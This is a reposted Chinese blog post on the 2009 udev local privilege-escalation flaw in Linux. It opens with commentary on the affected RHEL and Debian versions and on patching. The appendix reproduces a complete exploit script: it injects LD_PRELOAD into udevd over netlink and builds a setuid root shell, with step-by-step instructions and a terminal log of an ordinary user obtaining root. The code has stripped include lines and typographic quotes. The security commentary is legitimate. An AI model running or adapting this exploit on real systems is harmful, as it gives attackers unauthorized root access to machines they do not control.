udev：Linux里严重的本地安全漏洞

转自：http://www.ha97.com/1002.html

经过验证，我个人认为udev的漏洞是linux有史以来最危险的本地安全漏洞，通杀X86和X64架构下N个发行版的N个大版本和子版本，影响面相当大，互联网的血雨腥风即将到来。

这个漏洞对各大企业的安全人员发起挑战，我们的软件资产管理系统是否有足够的数据支撑我们做下面的事情？

1、给哪些系统打补丁？
2、哪些系统已经打上了补丁？
3、新上线的系统打了补丁了吗？如何发现？

几个主流发行版已经发布了新的udev程序以修复这个问题，不幸中的万幸是修复这个漏洞不需要重启，对业务系统的影响相对小了很多。

我已确认受影响系统：

RHEL 5.X x86和x64
Debian 4.x 5.x x86和x64

最后不得不说一句，各位看官的跳板机赶紧升级，此时此刻最危险的就是它。grsecurity帮我们规避了这次风险，即使没打补丁，黑客也无法利用此漏洞获得root权限，cool！看来非高压的关键业务系统部署高级安全策略还是值得的。

udev[11037]: segfault at 0 ip ac6b949b sp b7f7ae98 error 4 in libc-2.5.so[ac68c000+13e000]
udev[11370]: segfault at 0 ip 9b80c49b sp b120c868 error 4 in libc-2.5.so[9b7df000+13e000]

作者：baoz

附：普通用户通过udev漏洞提升到root权限演示

最近暴露出udev权限提示的漏洞，只要有普通用户权限，即可提升到root权限，实验了一把，果真很容易提升。
把下面代码保存为test.sh文件

#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a ‘cat /proc/net/netlink’
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid – 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn’t work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang

cat > udev.c << _EOF
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include #include

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];

sprintf(event, “add”);
sprintf(subsystem, “block”);
sprintf(sysfspath, “/dev/foo”);
sprintf(major, “8″);
sprintf(minor, “1″);

memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;

msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;

socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

char message[LONG_STRING];
char *mp;

mp = message;
mp += sprintf(mp, “%s@%s”, event, sysfspath) +1;
mp += sprintf(mp, “ACTION=%s”, event) +1;
mp += sprintf(mp, “DEVPATH=%s”, sysfspath) +1;
mp += sprintf(mp, “MAJOR=%s”, major) +1;
mp += sprintf(mp, “MINOR=%s”, minor) +1;
mp += sprintf(mp, “SUBSYSTEM=%s”, subsystem) +1;
mp += sprintf(mp, “LD_PRELOAD=/tmp/libno_ex.so.1.0″) +1;

iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);

char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);

sendmsg(socket_fd, &msg, 0);

close(socket_fd);

sleep(10);
// execl(“/tmp/suid”, “suid”, (void*)0);
}

_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include
#include
#include
#include
#include

void _init()
{
setgid(0);
setuid(0);
unsetenv(“LD_PRELOAD”);
// execl(“/bin/sh”,”sh”,”-c”,”chown root:root /tmp/suid; chmod +s /tmp/suid”,NULL);
chown(“/tmp/suid”,0,0);
chmod(“/tmp/suid”,S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl(“/bin/sh”,”sh”,0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1

# milw0rm.com[2009-04-20]

/tmp/suid

然后执行几个简单操作即可由普通用户提升至root权限了。

[test@rhel5 test]$ id
uid=500(test) gid=500(test) groups=500(test)
[test@rhel5 test]$ ps -ef|grep udev
root 502 1 0 13:04 ? 00:00:00 /sbin/udevd -d //查看目前udevd服务的id号
test 2635 2564 0 13:07 pts/0 00:00:00 grep udev
[test@rhel5 test]$ sh test.sh 501 //udevd的id号减1，即502-1 = 501
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.2# id
uid=0(root) gid=0(root) groups=500(test) //获取到root权限了
sh-3.2# ls /root/
anaconda-ks.cfg
sh-3.2#

赶紧update你的udev吧！